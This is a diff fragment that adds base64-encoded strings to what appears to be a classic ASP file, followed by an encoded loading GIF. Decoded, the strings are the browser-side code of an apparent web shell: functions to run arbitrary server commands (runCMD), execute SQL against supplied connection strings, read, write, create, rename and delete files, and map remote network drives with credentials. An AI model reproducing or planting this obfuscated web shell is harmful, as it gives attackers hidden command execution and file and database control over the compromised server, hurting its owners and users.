+"J2NsYXNzJyksICcnKTsKCQlpZC5wYXJlbnROb2RlLmNoaWxkTm9kZXNbNV0uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3MnKSwgJycpOwoJCWlkLnBhcmVudE5vZGUuY2hpbGROb2Rlc1s1XS5maXJzdENoaWxkLmNoZWNrZWQgPSB0cnVlOwoJfQp9CgpmdW5jdGlvbiBjaGVja2JveE1hbmFnZShpZCkK" &_
+"ewoJaWYoaWQuY2hlY2tlZCl7CgkJaWQucGFyZW50Tm9kZS5wYXJlbnROb2RlLmNoaWxkTm9kZXNbMF0uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3MnKSwgJycpOwoJCWlkLnBhcmVudE5vZGUucGFyZW50Tm9kZS5jaGlsZE5vZGVzWzNdLnNldEF0dHJpYnV0ZSgoaXNJRSA/ICdjbGFzc05hbWUnIDog" &_
+"J2NsYXNzJyksICcnKTsKCQlpZC5wYXJlbnROb2RlLnBhcmVudE5vZGUuY2hpbGROb2Rlc1s0XS5zZXRBdHRyaWJ1dGUoKGlzSUUgPyAnY2xhc3NOYW1lJyA6ICdjbGFzcycpLCAnJyk7CgkJaWQucGFyZW50Tm9kZS5wYXJlbnROb2RlLmNoaWxkTm9kZXNbNV0uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xh" &_
+"c3MnKSwgJycpOwoJfWVsc2V7CgkJaWQucGFyZW50Tm9kZS5wYXJlbnROb2RlLmNoaWxkTm9kZXNbMF0uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3MnKSwgJ2ticnRtJyk7CgkJaWQucGFyZW50Tm9kZS5wYXJlbnROb2RlLmNoaWxkTm9kZXNbM10uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFt" &_
+"ZScgOiAnY2xhc3MnKSwgJ2ticnRtJyk7CgkJaWQucGFyZW50Tm9kZS5wYXJlbnROb2RlLmNoaWxkTm9kZXNbNF0uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3MnKSwgJ2ticnRtJyk7CgkJaWQucGFyZW50Tm9kZS5wYXJlbnROb2RlLmNoaWxkTm9kZXNbNV0uc2V0QXR0cmlidXRlKChpc0lFID8gJ2Ns" &_
+"YXNzTmFtZScgOiAnY2xhc3MnKSwgJ2ticnRtJyk7Cgl9Cgp9CgpmdW5jdGlvbiBjaGVja0FsbChpZCkgewoJdmFyIGZtb2JqPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCJpbnB1dCIpOwoJZm9yICh2YXIgaT0wOyBpPGZtb2JqLmxlbmd0aDtpKyspIHsKCQl2YXIgZT1mbW9ialtpXTsKCQlpZiAoKGUubmFtZSE9J2No" &_
+"ZWNrYm94QWxsJykgJiYgKGUudHlwZT09J2NoZWNrYm94JykgJiYgKCFlLmRpc2FibGVkKSkgewoJCQllLnBhcmVudE5vZGUucGFyZW50Tm9kZS5jaGlsZE5vZGVzWzBdLnNldEF0dHJpYnV0ZSgoaXNJRSA/ICdjbGFzc05hbWUnIDogJ2NsYXNzJyksIChpZC5jaGVja2VkID8gJycgOiAna2JydG0nKSk7CgkJCWUucGFyZW50Tm9k" &_
+"ZS5wYXJlbnROb2RlLmNoaWxkTm9kZXNbM10uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3MnKSwgKGlkLmNoZWNrZWQgPyAnJyA6ICdrYnJ0bScpKTsKCQkJZS5wYXJlbnROb2RlLnBhcmVudE5vZGUuY2hpbGROb2Rlc1s0XS5zZXRBdHRyaWJ1dGUoKGlzSUUgPyAnY2xhc3NOYW1lJyA6ICdjbGFzcycp" &_
+"LCAoaWQuY2hlY2tlZCA/ICcnIDogJ2ticnRtJykpOwoJCQllLnBhcmVudE5vZGUucGFyZW50Tm9kZS5jaGlsZE5vZGVzWzVdLnNldEF0dHJpYnV0ZSgoaXNJRSA/ICdjbGFzc05hbWUnIDogJ2NsYXNzJyksIChpZC5jaGVja2VkID8gJycgOiAna2JydG0nKSk7CgkJCWUuY2hlY2tlZD1pZC5jaGVja2VkOwoJCX0KCX0KCglpZiAo" &_
+"aWQuY2hlY2tlZCkgewoJCWlkLnRpdGxlPSdDbGVhciBBbGwnOwoJfSBlbHNlIHsKCQlpZC50aXRsZT0nU2VsZWN0IEFsbCc7Cgl9Cn0KCmZ1bmN0aW9uIHNxbENvbW1hbmRDaGFuZ2UoKSB7CgoJaWYoZ2V0SWQoImNvbW1hbmRDaGFuZ2UiKS52YWx1ZSA9PSAiIDwtPiAiKQoJewoJCWdldElkKCJjb21tYW5kQ2hhbmdlIikudmFs" &_
+"dWUgPSAiID4tPCAiOwoJCXNob3dkaXYoInR4dHNxbGNvbW1hbmQiLCB0cnVlKTsKCQlzaG93ZGl2KCJzcWxjb21tYW5kIiwgZmFsc2UpOwoJfQoJZWxzZXsKCQlnZXRJZCgiY29tbWFuZENoYW5nZSIpLnZhbHVlID0gIiA8LT4gIjsKCQlzaG93ZGl2KCJzcWxjb21tYW5kIiwgdHJ1ZSk7CgkJc2hvd2RpdigidHh0c3FsY29tbWFu" &_
+"ZCIsIGZhbHNlKTsKCX0KCn0KCgpmdW5jdGlvbiBjbGVhckNvbnRlbnQoKQp7CglpZihnZXRJZCgidGJsTGlzdCIpKQoJCWdldElkKCJ0YmxDb250ZW50IikucmVtb3ZlQ2hpbGQoZ2V0SWQoInRibExpc3QiKSk7Cn0KCgovLyBNb2RlIC8vCmZ1bmN0aW9uIHJ1blNRTCgpCnsKCWlmKChnZXRJZCgic3FsY29ubmVjdGlvbiIpLnZh" &_
+"bHVlLnRyaW0oKSAhPSAiIikgJiYgKCgoZ2V0SWQoImNvbW1hbmRDaGFuZ2UiKS52YWx1ZSA9PSAiIDwtPiAiKSAmJiAoZ2V0SWQoInNxbGNvbW1hbmQiKS52YWx1ZS50cmltKCkgIT0gIiIpKSB8fCAoKGdldElkKCJjb21tYW5kQ2hhbmdlIikudmFsdWUgPT0gIiA+LTwgIikgJiYgKGdldElkKCJ0eHRzcWxjb21tYW5kIikudmFs" &_
+"dWUudHJpbSgpICE9ICIiKSkpKXsKCQlrZXk9WyJjb25uZWN0aW9uIiwgImNvbW1hbmQiXTsKCQl2YWx1ZT1bZ2V0SWQoInNxbGNvbm5lY3Rpb24iKS52YWx1ZSwgKGdldElkKCJjb21tYW5kQ2hhbmdlIikudmFsdWUgPT0gIiA8LT4gIikgPyBnZXRJZCgic3FsY29tbWFuZCIpLnZhbHVlIDogZ2V0SWQoInR4dHNxbGNvbW1hbmQi" &_
+"KS52YWx1ZV07CgkJc2VuZFJlcXVlc3RBY3Rpb24oInJ1blNRTCIsIFtrZXksIHZhbHVlXSk7Cgl9ZWxzZXsKCQlhbGVydCgiQ29ubmVjdGlvbiBTdHJpbmcgYW5kIFNRTCBDb21tYW5kIGFyZSByZXF1aXJlZCAhIik7Cgl9Cn0KCmZ1bmN0aW9uIHJ1bkNNRCgpCnsKCWlmKGdldElkKCJ2Y29tbWFuZCIpLnZhbHVlLnRyaW0oKSAh" &_
+"PSAiIil7CgkJa2V5PVsiY29tbWFuZCJdOwoJCXZhbHVlPVtnZXRJZCgidmNvbW1hbmQiKS52YWx1ZV07CgkJc2VuZFJlcXVlc3RBY3Rpb24oInJ1bkNNRCIsIFtrZXksIHZhbHVlXSk7Cgl9ZWxzZXsKCQlhbGVydCgiQ29tbWFuZCBpcyByZXF1aXJlZCAhIik7Cgl9Cn0KCmZ1bmN0aW9uIGxvYWRGaWxlKCkKewoJa2V5PVsiaXRl" &_
+"bVBhdGgiXTsKCXZhbHVlPVtnZXRWYXIod2luZG93LmxvY2F0aW9uLmhyZWYsMSldOwoJc2VuZFJlcXVlc3RBY3Rpb24oImxvYWRGaWxlIiwgW2tleSwgdmFsdWVdKTsKfQoKZnVuY3Rpb24gc2F2ZUZpbGUoaVN0YXJ0KQp7CglpZighaVN0YXJ0KSBpU3RhcnQ9MDsKCgl2YXIgaXRlbUNvbnRlbnQgPSBnZXRJZCgidHh0Q29udGVu" &_
+"dCIpLnZhbHVlOwoJa2V5PVsiaXRlbVBhdGgiLCAiaXRlbUNvbnRlbnQiLCAic2F2ZU1vZGUiXTsKCWlmKGN1cnJlbnRfcnVubmluZyA9PSBmYWxzZSl7CgkJdmFsdWU9W2dldFZhcih3aW5kb3cubG9jYXRpb24uaHJlZiwxKSwgaXRlbUNvbnRlbnQuc3Vic3RyaW5nKGlTdGFydCwoaXRlbUNvbnRlbnQubGVuZ3RoID4gaVN0YXJ0" &_
+"KzUxMjAwKSA/IGlTdGFydCs1MTIwMCA6IGl0ZW1Db250ZW50Lmxlbmd0aCksIChpU3RhcnQ9PTApID8gMiA6IDhdOwoJCXNlbmRSZXF1ZXN0QWN0aW9uKCJzYXZlRmlsZSIsIFtrZXksIHZhbHVlXSk7CgoJCWlmKGlTdGFydCs1MTIwMCA8IGl0ZW1Db250ZW50Lmxlbmd0aCl7CgkJCWlTdGFydCArPSA1MTIwMDsKCQkJc2F2ZVRp" &_
+"bWVyID0gc2V0VGltZW91dCgic2F2ZUZpbGUoIiArIGlTdGFydCArICIpOyIsIDEwMCk7CgkJfWVsc2V7CgkJCXNhdmVUaW1lciA9IGZhbHNlOwoJCX0KCX1lbHNlewoJCXNhdmVUaW1lciA9IHNldFRpbWVvdXQoInNhdmVGaWxlKCIgKyBpU3RhcnQgKyAiKTsiLCAxMDApOwoJfQp9CgpmdW5jdGlvbiByZW5hbWVGaWxlKGlkKQp7" &_
+"CiAgIGlmKGZmTGlzdC5maWxlc1tpZF0pCiAgIHsKCQlwb3NFeHAgPSBjdXJfcG9zKCk7CgkJc3RyID0gcHJvbXB0KCJQbGVhc2UgZW50ZXIgbmV3IG5hbWUgZm9yIHRoZSBmaWxlIiwgZmZMaXN0LmZpbGVzW2lkXS5zcGxpdCgifCIpWzBdKTsKCQlpZiAoIXN0ciB8fCAoc3RyPT1mZkxpc3QuZmlsZXNbaWRdLnNwbGl0KCJ8Iilb" &_
+"MF0pKSByZXR1cm47CgkJaWYgKCFDaGVja05hbWUoc3RyKSkge2FsZXJ0KCJGaWxlIG5hbWUgY2FuIG5vdCBjb250YWluIGFueSBvZiB0aGVcbmZvbGxvd2luZyBjaGFyYWN0ZXJzOiBcXCAvIDogKiA/IFwiIDwgPiB8Iik7IHJldHVybjt9CgoJCWtleT1bImZpbGVJZCIsICJmaWxlTmFtZSIsICJuZXdOYW1lIl07CgkJdmFsdWU9" &_
+"W2lkLCBmZkxpc3QuZmlsZXNbaWRdLnNwbGl0KCJ8IilbMF0sIHN0cl07CgkJc2VuZFJlcXVlc3RBY3Rpb24oInJlbmFtZUZpbGUiLCBba2V5LCB2YWx1ZV0pOwogICB9Cn0KCmZ1bmN0aW9uIHJlbmFtZUZvbGRlcihpZCkKewogICBpZihmZkxpc3QuZm9sZGVyc1tpZF0pCiAgIHsKCQlwb3NFeHAgPSBjdXJfcG9zKCk7CgkJc3Ry" &_
+"ID0gcHJvbXB0KCJQbGVhc2UgZW50ZXIgbmV3IG5hbWUgZm9yIHRoZSBmb2xkZXIiLCBmZkxpc3QuZm9sZGVyc1tpZF0uc3BsaXQoInwiKVswXSk7CgkJaWYgKCFzdHIgfHwgKHN0cj09ZmZMaXN0LmZvbGRlcnNbaWRdLnNwbGl0KCJ8IilbMF0pKSByZXR1cm47CgkJaWYgKCFDaGVja05hbWUoc3RyKSkge2FsZXJ0KCJGb2xkZXIg" &_
+"bmFtZSBjYW4gbm90IGNvbnRhaW4gYW55IG9mIHRoZVxuZm9sbG93aW5nIGNoYXJhY3RlcnM6IFxcIC8gOiAqID8gXCIgPCA+IHwiKTsgcmV0dXJuO30KCgkJa2V5PVsiZm9sZGVySWQiLCAiZm9sZGVyTmFtZSIsICJuZXdOYW1lIl07CgkJdmFsdWU9W2lkLCBmZkxpc3QuZm9sZGVyc1tpZF0uc3BsaXQoInwiKVswXSwgc3RyXTsK" &_
+"CQlzZW5kUmVxdWVzdEFjdGlvbigicmVuYW1lRm9sZGVyIiwgW2tleSwgdmFsdWVdKTsKICAgfQp9CgpmdW5jdGlvbiBuZXdGaWxlKCkKewoJcG9zRXhwID0gY3VyX3BvcygpOwoJc3RyID0gcHJvbXB0KCJQbGVhc2UgZW50ZXIgbmFtZSBmb3IgdGhlIG5ldyBmaWxlIiwgIm5ldy5hc3AiKTsKCWlmICghc3RyKSByZXR1cm47Cglp" &_
+"ZiAoIUNoZWNrTmFtZShzdHIpKSB7YWxlcnQoIkZpbGUgbmFtZSBjYW4gbm90IGNvbnRhaW4gYW55IG9mIHRoZVxuZm9sbG93aW5nIGNoYXJhY3RlcnM6IFxcIC8gOiAqID8gXCIgPCA+IHwiKTsgcmV0dXJuO30KCglrZXk9WyJpdGVtTmFtZSJdOwoJdmFsdWU9W3N0cl07CglzZW5kUmVxdWVzdEFjdGlvbigibmV3RmlsZSIsIFtr" &_
+"ZXksIHZhbHVlXSk7Cn0KCmZ1bmN0aW9uIG5ld0ZvbGRlcigpCnsKCXBvc0V4cCA9IGN1cl9wb3MoKTsKCXN0ciA9IHByb21wdCgiUGxlYXNlIGVudGVyIG5hbWUgZm9yIHRoZSBuZXcgZm9sZGVyIiwgIk5ldyBGb2xkZXIiKTsKCWlmICghc3RyKSByZXR1cm47CglpZiAoIUNoZWNrTmFtZShzdHIpKSB7YWxlcnQoIkZvbGRlciBu" &_
+"YW1lIGNhbiBub3QgY29udGFpbiBhbnkgb2YgdGhlXG5mb2xsb3dpbmcgY2hhcmFjdGVyczogXFwgLyA6ICogPyBcIiA8ID4gfCIpOyByZXR1cm47fQoKCWtleT1bIml0ZW1OYW1lIl07Cgl2YWx1ZT1bc3RyXTsKCXNlbmRSZXF1ZXN0QWN0aW9uKCJuZXdGb2xkZXIiLCBba2V5LCB2YWx1ZV0pOwp9CgoKZnVuY3Rpb24gcmVtb3Zl" &_
+"RHJpdmVyKGRyaXZlckxldHRlcikKewogICBpZihkcml2ZXJMZXR0ZXIpCiAgIHsKCQlpZiAoIWNvbmZpcm0oJ0FyZSB5b3Ugc3VyZSB0byByZW1vdmUgZHJpdmVyICcgKyBkcml2ZXJMZXR0ZXIgKyAnOiA/JykpIHJldHVybjsKCgkJcG9zRXhwID0gY3VyX3BvcygpOwoKCQlrZXk9WyJkcml2ZXJMZXR0ZXIiXTsKCQl2YWx1ZT1b" &_
+"ZHJpdmVyTGV0dGVyXTsKCQlzZW5kUmVxdWVzdEFjdGlvbigicmVtb3ZlRHJpdmVyIiwgW2tleSwgdmFsdWVdKTsKICAgfQp9CgpmdW5jdGlvbiBtYXBEcml2ZXIoKQp7CglpZiAoZ2V0SWQoImRyaXZlckxldHRlciIpLnZhbHVlLnRyaW0oKS5sZW5ndGggPCAxKSB7YWxlcnQoIkRyaXZlciBMZXR0ZXIgaXMgcmVxdWlyZWQgISIp" &_
+"O3JldHVybjt9CglpZiAoZ2V0SWQoImRyaXZlckxldHRlciIpLnZhbHVlLnRyaW0oKS5sZW5ndGggPiAxKSB7YWxlcnQoIkRyaXZlciBMZXR0ZXIgaXMgb25seSBvbmUgY2hhcmFjdGVyICEiKTtyZXR1cm47fQoJaWYgKGdldElkKCJyZW1vdGVTaGFyZSIpLnZhbHVlLnRyaW0oKS5sZW5ndGggPCAxKSB7YWxlcnQoIlJlbW90ZSBT" &_
+"aGFyZSBpcyByZXF1aXJlZCAhIik7cmV0dXJuO30KCglwb3NFeHAgPSBjdXJfcG9zKCk7CgoJa2V5PVsiZHJpdmVyTGV0dGVyIiwgInJlbW90ZVNoYXJlIiwgInVzZXJOYW1lIiwgInBhc3N3b3JkIl07Cgl2YWx1ZT1bZ2V0SWQoImRyaXZlckxldHRlciIpLnZhbHVlLnRyaW0oKSwgZ2V0SWQoInJlbW90ZVNoYXJlIikudmFsdWUu" &_
+"dHJpbSgpLCBnZXRJZCgidXNlck5hbWUiKS52YWx1ZS50cmltKCksIGdldElkKCJwYXNzd29yZCIpLnZhbHVlLnRyaW0oKV07CgloaWRlTWFwTmV0d29yaygpOwoJc2VuZFJlcXVlc3RBY3Rpb24oIm1hcERyaXZlciIsIFtrZXksIHZhbHVlXSk7Cn0KCmZ1bmN0aW9uIENvcHlNb3ZlKGFjdGlvbiwgdGFyZ2V0UGF0aCkKewogICBp" &_
+"Zih0YXJnZXRQYXRoLnRyaW0oKSAhPSAiIikKICAgewoJCXRhcmdldFBhdGggPSB0YXJnZXRQYXRoLnRyaW0oKTsKCQlsaXN0Rm9sZGVycyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlOYW1lKCJkeCIpOwoJCWxpc3RGaWxlcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlOYW1lKCJmeCIpOwoKCQlrZXk9WyJ0YXJnZXRQYXRoIl07" &_
+"CgkJdmFsdWU9W3RhcmdldFBhdGhdOwoKCQlmb3IoaT0wO2k8bGlzdEZvbGRlcnMubGVuZ3RoO2krKykKCQkJaWYobGlzdEZvbGRlcnNbaV0uY2hlY2tlZCl7CgkJCQlpZigoZmZMaXN0LmluZm8ucGF0aC5hZGRTbGFzaCgpICsgIGZmTGlzdC5mb2xkZXJzW2xpc3RGb2xkZXJzW2ldLnZhbHVlXS5zcGxpdCgifCIpWzBdKS5hZGRT" &_
+"bGFzaCgpID09IHRhcmdldFBhdGguYWRkU2xhc2goKSkKCQkJCXsKCQkJCQlhbGVydCgiQ2FuJ3QgIiArIGFjdGlvbiArICIgXCIiICsgZmZMaXN0LmZvbGRlcnNbbGlzdEZvbGRlcnNbaV0udmFsdWVdLnNwbGl0KCJ8IilbMF0gKyAiXCIgdG8gdGhlIGl0c2VsZiAhIik7CgkJCQkJcmV0dXJuOwoJCQkJfQoJCQkJa2V5LnB1c2go" &_
+"ImR4Iik7CgkJCQl2YWx1ZS5wdXNoKGZmTGlzdC5mb2xkZXJzW2xpc3RGb2xkZXJzW2ldLnZhbHVlXS5zcGxpdCgifCIpWzBdKTsKCQkJfQoKCQlmb3IoaT0wO2k8bGlzdEZpbGVzLmxlbmd0aDtpKyspCgkJCWlmKGxpc3RGaWxlc1tpXS5jaGVja2VkKXsKCQkJCWtleS5wdXNoKCJmeCIpOwoJCQkJdmFsdWUucHVzaChmZkxpc3Qu" &_
+"ZmlsZXNbbGlzdEZpbGVzW2ldLnZhbHVlXS5zcGxpdCgifCIpWzBdKTsKCQkJfQoKCQlpZihrZXkubGVuZ3RoIDw9IDEpIHsKCQkJYWxlcnQoIlNlbGVjdCBmaWxlKHMpIG9yIGZvbGRlcihzKSB0byAiICsgYWN0aW9uICsgIiAhIik7CgkJCXJldHVybjsKCQl9CgoJCWlmKHRhcmdldFBhdGguYWRkU2xhc2goKSA9PSBmZkxpc3Qu" &_
+"aW5mby5wYXRoLmFkZFNsYXNoKCkpCgkJewoJCQlhbGVydCgiQ2FuJ3QgIiArIGFjdGlvbiArICIgdG8gdGhlIHNhbWUgZm9sZGVyICEiKTsKCQkJcmV0dXJuOwoJCX0KCgkJaWYgKCFjb25maXJtKCdBcmUgeW91IHN1cmUgdG8gIicgKyBhY3Rpb24gKyAnIiAnICsgKGtleS5sZW5ndGggLSAxKSArICcgc2VsZWN0ZWQgaXRlbShz" &_
+"KSB0byAiJyArIHRhcmdldFBhdGguYWRkU2xhc2goKSArICciPycpKSByZXR1cm47CgoJCXBvc0V4cCA9IGN1cl9wb3MoKTsKCQlzZW5kUmVxdWVzdEFjdGlvbihhY3Rpb24sIFtrZXksIHZhbHVlXSk7CiAgIH1lbHNlewoJCWFsZXJ0KCJUYXJnZXQgbG9jYXRpb24gaXMgcmVxdWlyZWQgISIpOwogICB9Cn0KCgpmdW5jdGlvbiBE" &_
+"ZWxldGUoKQp7CgkJbGlzdEZvbGRlcnMgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgiZHgiKTsKCQlsaXN0RmlsZXMgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgiZngiKTsKCgkJa2V5PVtdOwoJCXZhbHVlPVtdOwoKCQlmb3IoaT0wO2k8bGlzdEZvbGRlcnMubGVuZ3RoO2krKykKCQkJaWYobGlzdEZvbGRlcnNb" &_
+"aV0uY2hlY2tlZCl7CgkJCQlrZXkucHVzaCgiZHgiKTsKCQkJCXZhbHVlLnB1c2goZmZMaXN0LmZvbGRlcnNbbGlzdEZvbGRlcnNbaV0udmFsdWVdLnNwbGl0KCJ8IilbMF0pOwoJCQl9CgoJCWZvcihpPTA7aTxsaXN0RmlsZXMubGVuZ3RoO2krKykKCQkJaWYobGlzdEZpbGVzW2ldLmNoZWNrZWQpewoJCQkJa2V5LnB1c2goImZ4" &_
+"Iik7CgkJCQl2YWx1ZS5wdXNoKGZmTGlzdC5maWxlc1tsaXN0RmlsZXNbaV0udmFsdWVdLnNwbGl0KCJ8IilbMF0pOwoJCQl9CgoJCWlmKGtleS5sZW5ndGggPCAxKSB7CgkJCWFsZXJ0KCJTZWxlY3QgZmlsZShzKSBvciBmb2xkZXIocykgdG8gZGVsZXRlICEiKTsKCQkJcmV0dXJuOwoJCX0KCgkJaWYgKCFjb25maXJtKCdBcmUg" &_
+"eW91IHN1cmUgdG8gImRlbGV0ZSIgJyArIChrZXkubGVuZ3RoKSArICcgc2VsZWN0ZWQgaXRlbShzKSA/JykpIHJldHVybjsKCgkJcG9zRXhwID0gY3VyX3BvcygpOwoJCXNlbmRSZXF1ZXN0QWN0aW9uKCJkZWxldGUiLCBba2V5LCB2YWx1ZV0pOwp9Ci8vLy8vLy8v"
+
+img_loading =  ""&_
+"R0lGODlhoABQAPMAADAwL/5NAH07HeVJBpc+F0o0KmQ3JLFCEvlMActFDL5DD0o0KdlHCD0xLIo8GthHCSH/C05FVFNDQVBFMi4wAwEAAAAh/hoiQ3JlYXRlZCB3aXRoIENoaW1wbHkuY29tIgAh+QQABQD/ACwAAAAAoABQAAAE/xDISau9OOvNu/9gKI6X8CAB4zRk675wDC5DYN/DIu/81RSFRYHVk9VuyAGxyHwFF1BooekSIK+B" &_
+"wSAhWFK/m2c0OgWHHlgkQrstm9+UxnhhMAgEBh28k76yt157YGJ0d4Z4ght9SX8CiW9idod3dY8YaItrWgicB12WTU+Sk3gGbqASVpkDnK0JCQqBqDCikw4EBwQEjrMTR1hrra6vsb0ycguTuLm6u7KPNMCbwgivr7zGtMmGy8y6d9kAJjac08Jb1gfhMQWSDgfwzd8CeuENCWzU1dYMA/EG61psWyaPgANKAQEUwMdK2ANrbODFe5Zw" &_
+"Q52CzQ5VbCBAQSt0r//+SIxXUYQBjPAUKMhVUoIBa/zYJBgJD2DLDwLkqdypckXLAzAZaqFJ8qaHbQIO8FSZy0HLBkAhalk5UkGCBwZtGtVwh8BSlc20VjQQdQtNBQ8YqG3mcysGjkqXynPqtpvEtGoTzHWrIa7VB2ln6uJLtqpatd50ieVLoVmCw4f1Mrb7OC9Guowr5KwMOS/jBt3w6sVIILMFsp0hK1hs9OSBh4kLmragILXaByxn" &_
+"5yS9jFK9zK9TP6A6G8BJ0mAnUfyp9CqD4SOLA7hVcCcpbHy7CTVbungD6rriHiT1eytZBX8aSXe5O9d1hJkJpP9TbP2E9xozC5iv5Zr9++9RV8f/KTcB1Q8bDKTzH3ukyFNHJVsFJWECCwKAFDcZPQjhTRMGVaE4h4BHgIYDGhXVY+fM9CFHGCpG4oYlvXSCPghgt2Ah37z44FYe0VjNcuvpSOJWDviohY0VCqlhEEOUhF5D5cj0IQXt" &_
+"6OgbGRXxl96UFFh5xxxCJDQNOZpowWWXJH4J5gJAPpIACldoQuGZE1T54JpSBPRLnAMgSadCeEaxjip9KPGnBYSsuQ4mhR6KaKBhhrPIDY5WgAyebQoyqQ2VVpAolotOykCnnoJJoDGEpoEZqRL8wGSmluyZBKysBhSNH+XVytg4WbSl66/ABivssMQWa+yxyCZLpwkoqECr/7IZuCrEsxncmkSu0Hrw6akhyIoDtdkCuia3HqSKxarh" &_
+"bnDpmtRyhB6cfYyabgeJ1kEJaxksxMamAcxL7xijGIKvBff8wa+/HERiS0bYGncAA1GyIirCYUARcE7xhKeAQbcolRc1Ei+CLsWWWnwIQVHt9Nhwf+gTMhaGkpzvhe/EY41KWqiVXgAgv4xDwzLXeXI8J1qVM8Rl0jhmr+D6O0rGMD05gFoRo9DzkUGDYKc8USOIdMtXJ9C0zA9yTYzUVJdpTpQJkJu1BvY6BgvOR7OSHoprcDH22+00" &_
+"45fRkKWXIDF7vx2HIX9zxrJMhBsuAx3vrKTLylQ99oonhTuegQ0dujjQcS4Day46KhEAACH5BAAFAP8ALAAAAACgAFAAAAT/EMhJq73APRTYUcOQCA1mnmiqrmzrvlMxBHSNhGFSwHzv/8DWrEa8hRCIxEEQbDqfUIuDSA0gryJlKcrtelOPKvWKTJgP37T6Kx6TzQzRgWBY2++9dvGNGxz+BFt4g4QYYXpWZH1+f3OFj5AZiIlIi4yN" &_
+"dZFrDQWdBYJ4Q2JkRn2NgJpqnqs7gzJVpAgPi0p/CgkPBA6ZqVCsrIUaNH4glWaLjQ8MywTNDqC9P5y/ntCQDQdmCX0Kf8rLCc3O0U2sCwYGAuq8vQbZcbUfy8tz4nTkQKsL6vzr+BMETiWYF86ern8+PO3rxw8dwgYBvYEzaEvdAoQvPKVjuM5Aq38G/wI+UGJQgUkF/axhNDFtI0N0DldmMEjgZDeGMld04tgx5sqQ9j6cJMDwYs4U" &_
+"BRg6sCeAHcal4oTe5HhUhcuABp/lbAC1pskDDnhWRYqOpjMmRw0s7UaU41KYH8dWSGe2rdGqLhmKg+lTLoWuTPnJXai3WVO+Tv0KABy2n2KlexF79EuhX8Cvbf02KExHcl+/6RxIPbmEMoBz6oh6hmlawr7RNgm0nrAanbpOKnM6sMn73uzV/VZR3s3b5LjZBST38yhcbjNbmMXNlqCc3wJWuRHWtTedOsx+13/JhZpNGcmD3QEk32gg" &_
+"vPixIQfOm5h4OjVgcuXPB5fd9P3meB3wzf98DxxQ32zT3NcfPhHdoswD3TiSHgX/xXXUKRg2MmEF91HWyDY4xLNhBQl+YlpNloSggGwjtmhAijgc2GJrAsAYAlozTpgNjErkuKE2ceDAgDY+TqjNkUgWmV42AylyhpLdGbBBLLLgCKVpDQxA5Q0LXrlSjVsOYKWXcoFwBBY5kGmajTioSZmWHCSyiGkacMCAVi0WEGcRIfr1ChUDWNid" &_
+"KGPc6BehRAzQZVVT6JHEor002oYDGx7SBgKCymSpGAxsOEkAYwkAwqeeTnJUASAiKkaliHSaU6patrqhpGJQKlONfexZ64iqDgPpI2bm2oaiI/6ZaKbtZFPJIroOg+zrdMIEMACe/2CjjSK5xjntr27ewaQZpFiSQLcgBbTNkHBg28eY5F4T0QF9XKuuCNy220KJudGFS4S04KKuDvZyoY9tfC0GyAHzFLgIuk3ekAC1ATuhD2einaQf" &_
+"A7P0qw0aEXORIGGpRWXTAPtlHOKR7HYcxCp5iVaPGSeFQKDGPaocBcuWAUIAzCbJPF+wWWhh882eMNRIMzzfQvJ8f2wzUmlDE71TP0fvnMDIBB4d9RcJ5oXVc1fbpF+EgWz9hUb9iGYPb3OUN4eMZktcAMgCZCWVOBDHnQYnC8EkDj9f76L3I+sVbNHgiF8ZAQAh+QQABQD/ACwAAAAAoABQAAAE/xDISautQo2Rzkmd0FxkaZ5oqq5s" &_
+"izoPEiDIRiMPyDAeYbjAoHBIXC0GgaTydntsNp4DYVSsWq/YClLJnTGfnIMCRHD8sui0uuTour/gx45HKFPX+Lz14e7SkmAIcwwJdWV6iIlAfX4yAU80gwyGPoqWlyWMXH81NoKDdVECBguYppd8ml4zkAODhQqxCgK0Iqe3eW2qN4GSYrKztQK4xGpbfU1xr7+xB8ICpcXSVkdvYR8JhGJzhcwKBM9n0+NEMIAOdxQGBAc5UgTAzrUO" &_
+"dQYGBeT5eQ30dbIHDmpRsmdPn0E1BgSwkyKMkg+C4g5KvLLgWb86oyDim8ixyjOHEP8JdgzSoECBBQXS5WvQ0FBIewJOphyp4uSCmzc3HlyQEOPLWjhR0jxhM2jOji9h0iIVVOfQCg2MGlWpr0DSWkyDUn1aVKpQjj+BSnX6VEJXryNDikVblkJRpfZu0rQK0SvOtm5vJnwWs+1Zo2TLRt3LNyLNqHYXbH1KuHDgjn+P4lXHd2lBv2Mn" &_
+"VyAoLOTkkjIXt4Wo0FBGzahLEHToMrXrClZZm35NW0Jp2dBqv77tcKlu17QulhH2O3XlZ8VR72XXDNyo5JoXOPDWzEE06Hip/xONfeI6YMAqdS9b2sO/Og7Gl5XtUDcMGQzQrQ+VQE4HQ7SrdRlwfaTCbJIUkt7/a8fsx10+BgAoCSGGTaYLIwOmJceCDDzQIF6pMMLAUOxMOMgDUrymShJDRTGGHA8oEIVmGWwwYgAlRiGjjHgVkEAg" &_
+"qmxIEzs3PtFBD3j1CIkqEXYkABhgqHghR0ciOYAjbgxwIDkHOPkEAXhpYCWUSvA3VIJCIjlMW1ZC4sgA8pUIQjZgaMPYB7yUqdmNX6wJwmHYJAAHkglMVgATTORw50h50hknGGO2pSegN4BwQFp2ggAoGAlMaVCTjNLAQaITFQpCDIcm8NhIWmZKwwGW3rJOla5EauimqRr0JJeAxopJAwuxuoGrg6K2AJdLaDpRrrruGumjqRW4ya4S" &_
